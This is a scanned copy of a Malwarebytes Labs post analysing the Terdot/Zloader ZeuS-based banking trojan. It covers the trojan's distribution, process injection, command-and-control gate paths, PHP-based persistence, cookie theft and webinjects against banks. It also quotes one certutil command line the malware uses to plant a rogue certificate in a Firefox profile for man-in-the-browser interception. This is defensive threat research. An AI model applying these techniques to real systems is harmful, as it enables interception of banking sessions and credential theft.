www.malwarebytes.com Open in urlscan Pro
2600:9000:223c:e400:16:26c7:ff80:93a1  Public Scan

Form analysis
2 forms found in the DOM

GET

<form id="search-form" onsubmit="submitSearchBlog(event)" method="get">
  <div class="searchbar-wrap-rightrail">
    <label for="cta-labs-rightrail-search-submit-en" aria-label="cta-labs-rightrail-search-submit-en" aria-labelledby="cta-labs-rightrail-search-submit-en">
      <input type="text" id="st-search-input-rightrail" class="st-search-input-rightrail" placeholder="Search Labs">
    </label>
    <button type="submit" id="cta-labs-rightrail-search-submit-en" aria-label="Submit your search query"><span class=""><img src="/blog/images/search.svg" alt="Magnifying glass"></span>
    </button>
  </div>
</form>

/newsletter/

<form class="newsletter-form form-inline" action="/newsletter/">
  <div class="email-input">
    <label for="cta-footer-newsletter-input-email-en" aria-label="cta-footer-newsletter-input-email-en" aria-labelledby="cta-footer-newsletter-input-email-en">
      <input type="text" class="email-input-field" id="cta-footer-newsletter-input-email-en" name="email" placeholder="Email Address">
    </label>
    <input name="source" type="hidden" value="">
    <input type="submit" class="submit-bttn" id="cta-footer-newsletter-subscribe-email-en" value="">
  </div>
</form>

Text Content

The official Malwarebytes logoThe official Malwarebytes logo in a blue font
       
Personal
Personal
 * Security & Antivirus
 * Malwarebytes for Windows
 * Malwarebytes for Mac
 * Malwarebytes for Chromebook
 * Malwarebytes for Android
 * Malwarebytes for iOS
 * Malwarebytes AdwCleaner

 * Online Privacy
 * Malwarebytes Privacy VPN
 * Malwarebytes Browser Guard
 *  
 * All-in-one Protection

 * Malwarebytes Premium + Privacy VPN   New

 * Get Started

 * The ultimate guide to privacy protection  New
   
   VISIT PRIVACY HUB  VISIT PRIVACY HUB

 *  

 * Stop infections before they happen

 * GET A FREE TRIAL  GET A FREE TRIAL

 *  

 * Find the right solution for you

 * SEE PERSONAL PRICING  SEE PERSONAL PRICING

Business
Business
 * Solutions
 * BY COMPANY SIZE
 * Small Businesses
 * single figure icon  1-99 Employees  Buy Online
 * Mid-size Businesses
 * two figure icon  100-999 Employees
 * Large Enterprise
 * three figure icon  1000+ Employees
 * BY INDUSTRY
 * Education
 * Finance
 * Healthcare
 * Government

 * Products
 * CLOUD-BASED SECURITY MANAGEMENT AND SERVICES
 * Endpoint Protection
 * Endpoint Protection for Servers
 * Endpoint Detection & Response
 * Endpoint Detection & Response for Servers
 * Incident Response
 * Malware Removal Service
 * Nebula Platform Architecture
 * Cloud Storage Scanning Service  New
 * CLOUD-BASED SECURITY MODULES
 * DNS Filtering
 * Vulnerability & Patch Management
 * Remediation for CrowdStrike®
 * NEXT-GEN ANTIVIRUS FOR SMALL BUSINESS
 * For Teams

 * Get Started
 *  * Find the right solution for your business
    * See business pricing See business pricing
   
   --------------------------------------------------------------------------------
   
    * Don't know where to start?
    * Help me choose a product See business products selector
   
   --------------------------------------------------------------------------------
   
    * See what Malwarebytes can do for you
    * Get a free trial Get a free trial
   
   --------------------------------------------------------------------------------
   
    * Our sales team is ready to help. Call us now
    * Phone icon +49 (800) 723-4800

Pricing
Partners
Partners
 * Partner Icon Explore Partnerships

 * Partner Solutions
 * Resellers
 * Managed Service Providers
 * Computer Repair
 * Technology Partners
 * Buy now Buy Now

 * Partner Success Story
 * Marek Drummond
   Managing Director at Optimus Systems
   
   "Thanks to the Malwarebytes MSP program, we have this high-quality product in
   our stack. It’s a great addition, and I have confidence that customers’
   systems are protected."

 * See full story See full story

Resources
Resources
 * Learn About Cybersecurity
 * Antivirus
 * Malware
 * Ransomware
 * Malwarebytes Labs – Blog
 * Glossary
 * Threat Center

 * Business Resources
 * Reviews
 * Analyst Reports
 * Case Studies
 * Press & News

 * Events
 * 
   
   
   
   Featured Event: RSA 2021

 * See Event See event

Support
Support
 * Technical Support
 * Personal Support
 * Business Support
 * Premium Services
 * Forums
 * Vulnerability Disclosure

 * Watch Icon Training for Personal Products
 * Watch Icon Training for Business Products

 * Featured Content
 * Privacy Logo
   
   
   
   Activate Malwarebytes Privacy on Windows device.

 * See Content See content

FREE DOWNLOAD
CONTACT US
COMPANY
COMPANY
 * About Malwarebytes
 * Careers
 * News & Press

SIGN IN
SIGN IN
 * My Account
 * Cloud Console
 * Partner Portal

SUBSCRIBE


Cybercrime | News | Threats


ZBOT WITH LEGITIMATE APPLICATIONS ON BOARD

Posted: January 26, 2017 by Malwarebytes Labs

Recently, among the payloads delivered by exploit kits, we often find
Terdot.A/Zloader - a downloader installing on the victim machine a ZeuS-based
malware.

Source code of the infamous ZeuS malware leaked in 2011. Since that time, many
cybercriminals has adopted it and augmented with their own ideas. Recently,
among the payloads delivered by exploit kits, we often find Terdot.A/Zloader - a
downloader installing on the victim machine a ZeuS-based malware.

The payload is very similar to the malware described in this article and
referenced under the name Sphinx. However, after consulting with other
researchers (special thanks to Matthew Mesa), we got proven that the bot that is
sold as Sphinx is very different (sample). Since there are many confusions about
the naming, we decided to stick to the name Terdot Zloader/Zbot.

In this post we will have a look at the features and internals of this malware.
As we will see, the dropped package consists not only of malicious files -  but
also legitimate applications, used for the malicious purpose.


ANALYZED SAMPLE

d45b8a20a991acd01d2ff63735fc1adf - original executable #1



950368afb934fd3fd5b2d4e6704b757b - original executable #2

fca092aca679edd9564d00e9640f939d - original executable #3

 * ae1d1f4597f76912d7bd9962b96eecbb - loader (unpacked)
   * 268fd83403da27a80ab1a3cf9ac45b67 - payload.dll (injected into explorer)
     * 6c34779503414210378371d250a3a1af - client32.dll (Zbot downloaded and
       injected into msiexec, and into browsers)

f9373dc232028da52ad33b017e33bbd3 - original executable #4


DISTRIBUTION

Most of the analyzed samples were dropped from SundownEK  - some of the
campaigns are described in details here: 28 Dec 2016 , 6 Jan 2017, and 18 Jan
2017. However, we also encountered cases when the Terdot.A/Zloader was dropped
by the malicious email attachment.


BEHAVIORAL ANALYSIS

After the sample is run, we can see it deploying explorer and then terminating.
It is easy to guess, that it injected some malicious modules there.





If we attach a debugger into the explorer process, we can see the injected
shellcode, along with a new PE file (payload.dll). The interesting and unusual
thing, typical for this Zloader is, that the DLL does not start at the beginning
of the memory page, but after the shellcode:



If we have an internet connection, the Zloader will load the second stage (the
main bot) and inject it into msiexec.exe.

The injected module beacons to the CnC and downloads other modules. Observed
patterns of the gates:

/FE8hVs3/gs98h.php
/bdk/gate.php

The communication is encrypted:





CnC responds with a new PE file - the module of the malware: (client32.dll).
Downloader decrypts it in the memory and injects further: after a while we can
see the explorer terminating and another program being deployed: msiexec. The
initial malware executable is deleted.



Attaching debugger to msiexec, we can find the Zbot (client32.dll) implanted and
running in the process space.



From inside of the injected module another internet connection is made, and some
new elements are being downloaded and dropped (including legitimate applications
like certutil and php - their role will be described further). The same
client32.dll is also injected in browsers.



The module deployed inside msiexec.exe is used as a supervisor. It opens TCP
sockets locally and communicates with the modules injected in browsers, in order
to monitor opened pages.



MITM

The main module of the bot downloads and drops some new elements into the %TEMP%
folder. Surprisingly, those files are non-malware. We can see the certutil
application (0c6b43c9602f4d5ac9dcf907103447c4) along with it's dependencies -
legitimate DLLs.



In the same folder, there is also some alien certificate (filename, as well as
the name of the issuer is randomly generated).



The certificate is installed with the help of the certutil, for the purpose of
Man-in-the-Middle attacks (in such cases they are also called
Man-in-the-Browser).



Example - a command line deployed during tests:

"C:\Users\tester\AppData\Local\Temp\certutil.exe" 
-A -n "otdarufyr" 
-t "C,C,C" -i "C:\Users\tester\AppData\Local\Temp\nedea.crt" 
-d "C:\Users\tester\AppData\Roaming\Mozilla\Firefox\Profiles\be7dt337.default"


It is easy to guess that this malware targets web browsers. Indeed, if we run a
browser and try to visit some site over HTTPS, we will see that the original
certificates are replaced by the malicious one. See examples below - draw
attention that the subject of the certificate contains the valid domain - only
the issuer field can let us recognize, that the certificate is not legitimate:



Satander MitB on Firefox:



The browser claims that the connection  is secure - but when we see the details,
we can find, that the connection is "protected" by the fake certificate dropped
by the malware:



Facebook MitB on InternetExplorer:



Browsers do not alert about any inconsistency - and the user who was not
vigilant enough to check the details of the certificate, may easily get
deceived...



If we attach a debbugger into the running browser, we can see that the same
client32.dll is injected there - along with some more code used for API
redirections.

PERSISTENCE

In addition to the content dropped in %TEMP%, we can see some new folders with
random names created in %APPDATA%:





Interesting fact is that one of them contains legitimate php.exe (see on
VirusTotal: php.exe, php5ts.dll).



...and some obfuscated php code:

https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-script-php

(Formatted version here).

Other folders contains some encrypted data, i.e.:



Interestingly, this php package is referenced at autostart:



Link deploys the dropped php application and runs the script, that we saw
before:



We can easily suspect that this is a method of persistence. Deobfuscating the
PHP code confirms this guess. See the same code after cleanup:

https://gist.github.com/hasherezade/1952374847712805c4f7199b7423dd27#file-deobfuscated-php

As we can notice, the file royxh.umh contains encrypted code of the malware.
Using the presented PHP script it is decrypted back into the Zloader executable:

fca092aca679edd9564d00e9640f939d

The dropped file is run and then deleted.


INSIDE

ZLOADER - PAYLOAD.DLL

This element - unpacked from the initial sample and injected into explorer.exe -
is a downloader - identified as Terdot.A/Zloader. It is responsible for
connecting with the CnC and downloading the main malicious module, that is the
Zbot.





ZBOT - CLIENT32.DLL

The second stage is also a DLL - this time it is injected into msiexec.exe as
well as into browsers:





ATTACKED TARGETS

The bot injects itself into the most popular browsers, in order to hook their
API:





It excludes from the attack computers with Russian language installed - but
instead of doing it silently, like most of the malware - it is very openly
announcing this fact:



THE SQL PART

Inside the bot we can find references to an SQL release from the end of 2016
(see SQLite Release 3.15.1 On 2016-11-04):





2016-11-04 12:08:49 1136863c76576110e710dd5d69ab6bf347c65e36


Presence of those references confirms, that the bot is pretty new, and probably
under active development.



We can also see many SQL queries and related error messages among the strings:



They are used to read and manipulate browser cookies, that are stored in form of
SQLite databases.



Queries deployed:



MAN-IN-THE-BROWSER

The main module injected into msiexec opens local TCP sockets that are used to
communicate with the module injected into browser.





All the communication between the browser and particular website is first
bypassed by client32.dll injected into msiexec.



Like many Zbots, Terdot not only spy but also allows to modify the displayed
content, by "WebInjects" and "WebFakes".

Sites that are going to be hooked are specified by configuration. Example of the
target list from one of the samples shows, that the main interest of the
attackers are various banks:
https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-targets-txt

Webinjects are implemented by adding malicious scripts (specialized for a
specific target) into the content of the website. The scripts are hosted on the
server controlled by attackers. Sample list of the scripts, fetched by the bot
during tests:
https://gist.github.com/hasherezade/4db462af582c079b0ffa059b1fd2c465#file-injects-txt
Those java scripts are implanted into the the attacked site before it is
displayed in the browser - along with some more, obfuscated code. Templates of
such implants are downloaded from the CnC server. You can see some examples
here.


CONCLUSION

Terdot is yet another bot based on Zeus. Feature-wise it is similar to other
bankers. However, I think it deserved some attention because of it's recent
popularity. It has been prepared with attention to details, so we may suspect
that it is a work of professionals. It is actively developed, distributed and
maintained - so, the probability is high, that we will be seeing it more in the
future.





--------------------------------------------------------------------------------

This was a guest post written by Hasherezade, an independent researcher and
programmer with a strong interest in InfoSec. She loves going in details about
malware and sharing threat information with the community. Check her out on
Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.



SHARE THIS ARTICLE

--------------------------------------------------------------------------------

COMMENTS



--------------------------------------------------------------------------------

RELATED ARTICLES

Exploits and vulnerabilities | News


TWO NEW EXCHANGE SERVER ZERO-DAYS IN THE WILD

September 30, 2022 - Two ProxyShell-like vulnerabilities are being used to
exploit Microsoft Exchange Servers

CONTINUE READING 0 Comments

News


OPTUS DATA BREACH "ATTACKER" SAYS SORRY, IT WAS A MISTAKE

September 29, 2022 - A hacker stole the personal information of 10 million Optus
customers, threatened to publish them in lots of 10,000 a day unless the ransom
was paid, and then suddenly did a 180 degree turn.

CONTINUE READING 0 Comments

News


APT28 ATTACK USES OLD POWERPOINT TRICK TO DOWNLOAD MALWARE

September 28, 2022 - The Russian APT known as Fancy Bear was caught using an old
mouseover technique that doesn't need macros

CONTINUE READING 0 Comments

News


SPYWARE DISGUISES ITSELF AS ZOOM DOWNLOADS

September 28, 2022 - Criminals are taking advantage Zoom's continuing popularity

CONTINUE READING 0 Comments

News | Scams


FCC MOVES TO BLOCK ROBOTEXTS

September 28, 2022 - The Federal Communications Commission wants mobile carriers
to block spam texts at the network level.

CONTINUE READING 0 Comments

--------------------------------------------------------------------------------

ABOUT THE AUTHOR

Malwarebytes Labs





Contributors


Threat Center


Podcast


Glossary


Scams


Write for Labs

Cyberprotection for every one.

twitter
facebook
linkedin
Youtube
instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our
newsletter and learn how to protect your computer from threats.



Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle
12th Floor
Santa Clara, CA 95054

ADDRESS

One Albert Quay
2nd Floor
Cork T12 X8N6
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor
Cork T12 X8N6
Ireland

twitter
facebook
linkedin
Youtube
instagram
   English
Legal
Privacy
Accessibility
Vulnerability Disclosure
Terms of Service


© 2022 All Rights Reserved

Select your language

 * English
 * Deutsch
 * Español
 * Français
 * Italiano
 * Português (Portugal)
 * Português (Brasil)
 * Nederlands
 * Polski
 * Pусский
 * 日本語
 * Svenska